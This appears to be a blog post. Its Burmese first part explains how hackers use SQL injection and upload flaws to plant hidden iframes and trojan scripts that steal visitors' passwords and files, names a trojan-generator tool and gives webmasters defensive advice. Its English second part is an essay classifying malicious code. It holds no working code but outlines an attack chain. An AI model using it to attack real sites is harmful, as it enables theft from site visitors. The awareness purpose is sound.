ယခုအခ်ိန္ေတြမွာ  website ေတြ အဟက္ခံရတယ္။ တစ္ခုၿပီးတစ္ခုပါပဲ။ ဒါေတြက website တစ္ခု အဟက္ခံရလုိ႔ အဲ႔ site တစ္ခုတည္းထိတာမဟုတ္ပါဘူး။ ဟက္ကာေတာ္ေတာ္မ်ားမ်ားက site တစ္ခုကုိရသြားရင္ defacement တစ္ခုလုပ္တာကလြဲရင္ က်န္တာဘာမွမလုပ္ပါဘူး။ ဒီအတြက္ လာေရာက္လည္ပတ္တဲ႔သူကုိလည္း မထိခုိက္ပါဘူး။ ဒါေပမဲ႔ အႏၱရယ္ရွိတာက Mailicous Code ေတြ ထည့္သြားမ့ဲ Hacker ေတြကုိေတာ့ အလြန္ကုိ ေၾကာက္စရာ ေကာင္းတယ္ ဆုိတာ သိေစခ်င္လုိ႔ ဒီ Post ကုိ Korea Information Security Agency နဲ႔ ကၽြန္ေတာ့္ မိတ္ေဆြ bot hacker (တရုတ္ၿပည္မွ Game Password Hacker) တစ္ေယာက္ တုိ႔အား ကုိးကားၿပီးေရးထားတာပါ။

Malicious Codes မ်ား ထည့္သြင္းမႈအတြက္ ဟက္ကာေတြ တုိက္ခုိက္ရာတြင္

၁. တုိက္ခုိက္ေရးသမားေတြက မိမိတုိ႔ရဲ႕ Target ကြန္ပ်ဴတာ၊ အဖြဲ႕အစည္း၊ Website ေတြထဲကုိ SQL Injection ေတြနဲ႔ ၀င္ေရာက္ၾကပါတယ္။ SQL Injection ေတြတစ္ခုတည္းလားဆုိေတာ့လည္း ဒီတစ္ခုတည္းေတာ့မဟုတ္ပါဘူး။ တစ္ၿခားတုိက္ခုိက္လုိ႔ရတဲ႔ နည္းလမ္းေတြအမ်ားၾကီးရွိပါတယ္။ ဘယ္လုိပင္ ၿဖစ္ပါေစ သူတုိ႔ လုိခ်င္တဲ႔အပုိင္းကေတာ့ user ေတြ အမ်ားအၿပား ၀င္ေရာက္လည္ပတ္တတ္တဲ႔ ေနရာေတြပါ။ ဒီလူေတြဆီကေန Cookies ေတြခုိးမယ္။ IP ေတြယူမယ္ စသည္ၿဖင့္ေပါ႔။

၂။ တုိက္ခုိက္ေရးသမားေတြက Vulnerability Website ေတြထဲမွာ ၄င္းတုိ႔ရဲ႕ Malicious Code ေတြ ထည့္သြင္းထားေသာ Attacker ရဲ႕ Web Link ေတြ ခ်ိတ္ဆက္ေပးပါတယ္။ ဒီလုိခ်ိတ္ဆက္တဲ႔ေနရာမွာ iframe ဆုိတာနဲ႔သုံးၾကပါတယ္။
iframe ဆုိတာ webpage element တစ္ခုၿဖစ္ၿပီး တစ္ၿခား web page ေတြကုိ ၄င္းရဲ႕ သတ္မွတ္ထားတဲ႔ ေဘာင္အတြင္းမွာ အလုပ္လုပ္ရန္အတြက္ အသုံးၿပဳၾကပါတယ္။ ....

ဥပမာ . . Planet Myanmar Website မွာ Iframe ကုိထည့္သြင္းထားပုံကုိၾကည့္ပါ။

ဆုိတာကုိၾကည့္ပါ။

၃. အဲ႔အခ်ိန္မွာ အင္တာနက္ အသုံးၿပဳသူေတြက Attacker (Hacker) ေတြ ဟက္လုပ္ထားတဲ႔ Website ေတြကုိ ၀င္ေရာက္လည္ပတ္ပါတယ္။

၄. အကယ္၍ အင္တာနက္ အသုံးၿပဳရဲ႕ ကြန္ပ်ဴတာက လုံၿခံဳေရးမရွိၿခင္း၊ Up to Date မၿဖစ္ေနတဲ႔ Internet Security or Antivirus မရွိဘူးဆုိရင္ ထုိကဲ႔သုိ႔ေသာ Website မွေန အလြယ္တကူ မိမိရဲ႕ ကြန္ပ်ဴတာကုိ Trojan ေတြ၀င္ေရာက္လာပါလိမ့္မယ္။

၅. ၿပီးရင္ မိမိရဲ႕ Information ေတြ၊ user ID, Password ေတြကုိ သတ္မွတ္ထားတဲ႔ လမ္းေၾကာင္းလိပ္စာအတုိင္း ၿပန္လည္ခုိးယူပုိ႔ေပးပါလိမ့္မယ္။

ဒီလုိတုိက္ခုိက္မႈမ်ိဳးက ယေန႔ေခတ္မွာေတာ္ေတာ္ေလးကုိ ေတြ႔ရၿပီး Porn / Unsecure site ေတြကုိ ၀င္ေရာက္လည္ပတ္က Antivirus အသြင္၀င္ေရာက္လာတတ္တဲ႔ Malware ေတြနဲ႔ ဆင္တူပါတယ္။ ဒါေပမဲ႔ဒီေကာင္က နဲနဲအဆင့္ပုိၿမင့္သြားတယ္။ ဒီလုိပုံစံေတြက Website ေတာ္ေတာ္မ်ားမ်ားမွာ ၿဖစ္ၾကၿပီးေတာ့ ၿဖစ္လုိက္တဲ႔ Website ေတြရဲ႕ ၉၀ ရာခုိင္းႏႈန္းကေတာ့ SQL Injection vulnerability မွေန ဟက္ကာေတြ ၀င္ေရာက္ကာ malicious codes ေတြ ထည့္သြင္းသြားၿခင္းၿဖစ္ပါတယ္။
ေနာက္တစ္ခုကေတာ့ Upload Vulnerability ပါ.. သူကေတာ့ WebBoard ေတြမွာ user ေတြအတြက္ image upload ေတြေပးထားတာကေနၿဖစ္တာပါ။
i. ထုိ Web Board က extension ဖုိင္ စီစစ္မႈကုိမထားၿခင္း။ ( Webmaster ေတြသတိၿပဳရမွာက ထုိကဲ႔သုိ႔ေသာ Upload setting မွာ extension filtering ကုိစစ္ဖုိ႔လုိပါတယ္)
ii. Upload လုပ္ထားေသာ file ၏ လမ္းေၾကာင္းကုိ user ႏွင့္ Attacker မွ အလြယ္တစ္ကူ ရယူသိရွိႏုိင္ၿခင္း။
iii. Upload လုပ္ထားေသာ file မ်ားရွိ folder အား execute လုပ္ခြင့္ ခြင့္ၿပဳခ်က္ေပးထားၿခင္းေၾကာင္းၿဖစ္သည္။

ဒီေတာ့ Trojan File ေတြနဲ႔ user ေတြကုိ ဘယ္လုိ တုိက္ခုိက္လဲဆုိတာကုိ အနည္းငယ္ ထပ္ၿပီးရွင္းပါမယ္..

Ice Fox Prodigal Web Trojan Generator ဒါက Website ေတြကုိ တုိက္ခုိက္တဲ႔ေနရာမွာ အလြယ္တကူ အသုံးၿပဳႏုိင္တဲ႔ Virus Creator တစ္ခုပါပဲ။ (ဟက္ကာေတာ္ေတာ္မ်ားမ်ားကေတာ့ သူတုိ႔ကုိယ္တုိင္ Code လုပ္တာမ်ားပါတယ္။)

၄င္းအထဲမွာ iframe ကုိ width=0 ဆုိၿပီး ၿမွဳပ္ထားပါတယ္။ ၿပီးရင္ icyfox.htm ဆုိတာက icyfox.js ပါတဲ႔ Backdoor/Trojan ဖုိင္ေတြကုိ ဆြဲယူသုံးတဲ႔သူေတြပါ။ တစ္နည္းအားၿဖင့္ ၄င္း .js အထဲမွာ Hacker ေရးဆြဲထားတဲ႔ လမ္းေၾကာင္းအတုိင္းကုိ လုပ္ေဆာင္မယ့္ Code ေတြရွိပါတယ္။

Malicious Code ေတြကုိထည့္တာကေတာ့ ဒါပဲ... ဒီအထဲမွာ Malicious Website ကုိ လာေရာက္လည္ပတ္တဲ႔သူေတြရဲ႕ Computer တုိင္းလုိလုိမွာ Trojan ေတြထည့္လုိက္တယ္။ ၿပီးရင္ ၄င္း ကြန္ပ်ဴတာေတြထဲကေန File / Folder ေတြကုိ ခုိးယူလုိ႔ရေအာင္ Remote Access သုံးလုိ႔ရေအာင္ အသုံးၿပဳတဲ႔ Web Base UI Program ေတြနဲ႔ Internet User ေတြရဲ႕ ကြန္ပ်ဴတာကုိ လုိအပ္သလုိ ထိန္းခ်ဴပ္တယ္။ ဒီအတုိင္းနဲ႔ 2005 ေလာက္က တရုတ္ၿပည္မွာ oct 16 ကေန oct 17 အထိ ၃၄ နာရီအတြင္းကုိ ၁၂၁၆ ေယာက္ေလာက္ ထိသြားတယ္။

Web Adminstrator တစ္ေယာက္အေနနဲ႔ မိမိ website ရဲ႕ ReWrite Rule ေတြကုိသိထားရမယ္။ Security Holes ေတြကုိ အၿမဲစစ္ၾကည့္ေနရမယ္။ user ေတြဘက္ကေန script uploading နဲ႔ execution ေတြကုိ block လုပ္ထားရမယ္။ Attacker တစ္ေယာက္ malicious script တစ္ခု run တာနဲ႔ site တစ္ခုတည္းမဟုတ္ဘူး server ရဲ႕ root ထဲအထိကုိေရာက္ႏုိင္တယ္။ web board ေတြမွာ image uploading module ေတြကုိ သတိထားရတယ္။





Ref:worldwidemyanmar

***********************************************************************************************************************************************************************************************

Malicious Codes in Depth

Abstract

Malicious code refers to a broad category of software threats to your network and systems. Perhaps the most sophisticated types of threats to computer systems are presented by malicious codes that exploit vulnerabilities in computer systems. Any code which modifies or destroys data, steals data , allows unauthorized access Exploits or damage a system, and does something that user did not intend to do, is called malicious code. This paper will briefly introduce you to the various types of malicious code you will encounter, including Viruses, Trojan horses, Logic bombs and Worms.

Taxonomy of malicious Code

A computer program is a sequence of symbols that are caucused to achieve a desired functionality; the program is termed malicious when their sequences of instructions are used to intentionally cause adverse affects to the system. In the other words we can't call any "bug" as a Malicious Code. Malicious codes are also called programmed threats. The following figure provides an overall taxonomy of Malicious Code.

Figure 1 Malicious Code Taxonomy

Taxonomy is a system of classification allowing one to uniquely identify something. As presented in the above figure, threats can be divided into two categories:

• Independents: are self contained program that can be scheduled and ran by the operating system.



• Needs host program: are essentially fragments of programs that can not exist independently of some actual application program, utility or system program.

You must also differentiate between these software threats that do not replicate and these that do. (Replication is a process that a code reproduces or duplicates itself.)The former are fragments of programs that are to be activated when the host program is invoked to perform a specific function , the latter consist of either a program fragment or an independent program (worm , zombie ) that when executed may produce one or more copies of itself to be activated later on the same system or some other system . In the following, I briefly survey each at these parts of malicious software.

Trap doors

defined - 1.syn.Back doors a bad thing. 2. A Trap door function is one which is easy to compute but very difficult to compute the inverse of [Jargon Dictionary]
A trap door is a secret entry point into a program that allows someone that is aware at the trap door to gain access without going through the usual security access procedure. In many cases attacks using trap doors can give a great degree of access to the application, important data, or given the hosting system. Trap doors have been used legitimately by programmers to debug and test programs, some of the legitimate reasons for trap doors are:

1. Intentionally leaves them for testing, and make testing easier.
   
   
2. Intentionally leaves them for covert means of access. In the other words, allows access in event of errors.
   
   
3. Intentionally leaves them for fixing bugs.

But they may use illegitimately, to provide future, illegal access. Trap doors become threats when they are used by unscrupulous programmers to gain unauthorized access.

Back door is another name for a trap door, back doors provide immediate access to a system by passing employed authentication and security protocols, Attackers can use back doors to bypass security control and gain control at a system without time consuming hacking.

Logic Bombs

defined - The logic bomb is code embedded in some legitimate program that execute when a certain predefined events occurs, these codes surreptitiously inserted into an application or operating system that causes it to perform some destructive or security – compromising activity whenever specified conditions are met [Jargon Dictionary]

A bomb may sent a note to an attacker when a user is logged on to the internet and is using an specific program such as a word processor, this message informs the attacker that the user is ready for an attack, figure 2 shows a logic bomb in operation .Notice that this bomb dose not actually begin the attack but tells the attacker that the victim has met needed state for an attack to begin.

Figure 2 Logic Bombs

1. Attacker implants logic bomb
2. Victim reports installation
3. Attacker sends attack message
4. Victim dose as logic bomb installation

Examples of conditions that can be used as triggers for a logic bomb are the presence or absence at certain files, a particular day of the week or date, or a particular user running the application. One triggered a bomb may alter or delete data or entire files, cause a machine half or do some other damage.

Trojan Horses

defined - A malicious, security –breaking program that is disguised as something benign, such as directory lister, archiver, game, or (in one notorious 1990 case on Mac) a program to find and destroy viruses!" [Jargon Dictionary]

A Trojan horse is a useful, or apparently useful program or command procedure containing hidden code that when invoked performs some unwanted or harmful function. Trojan Horses can be used to accomplish functions indirectly that an unauthorized user could not accomplish directly. For example, to gain access to the files of another user on a shared system, a user could create a Trojan Horse program that when executed, changed the invoking user's file permissions so that the file are readable by any user, the another example of Trojan horse program is a compiler that has been modified to insert additional code into certain programs as they are compiled such as a system login program, the code creates a trap door in the login program that permits the author to log on to the system using a special password. Another common motivation for the Trojan horse is data destruction.
The program appears to be performing a useful function but it may also be quietly deleting the victim's files.

Zombie

A zombie is a program that secretly takes over another internet-attached computer and then uses that computer to launch attacks that are difficult to trace to the zombie's creator. Zombies are used in Denial of service attacks, typically against targeted web sites. The zombie is planted on hundreds of computers belonging to unsuspecting third parties and then used to overwhelm the target website by launching on overwhelming onslaught of internet traffic.




More Malicious Code tutorials and guides

********************************************************************************************************************************************************

Labels: Hacking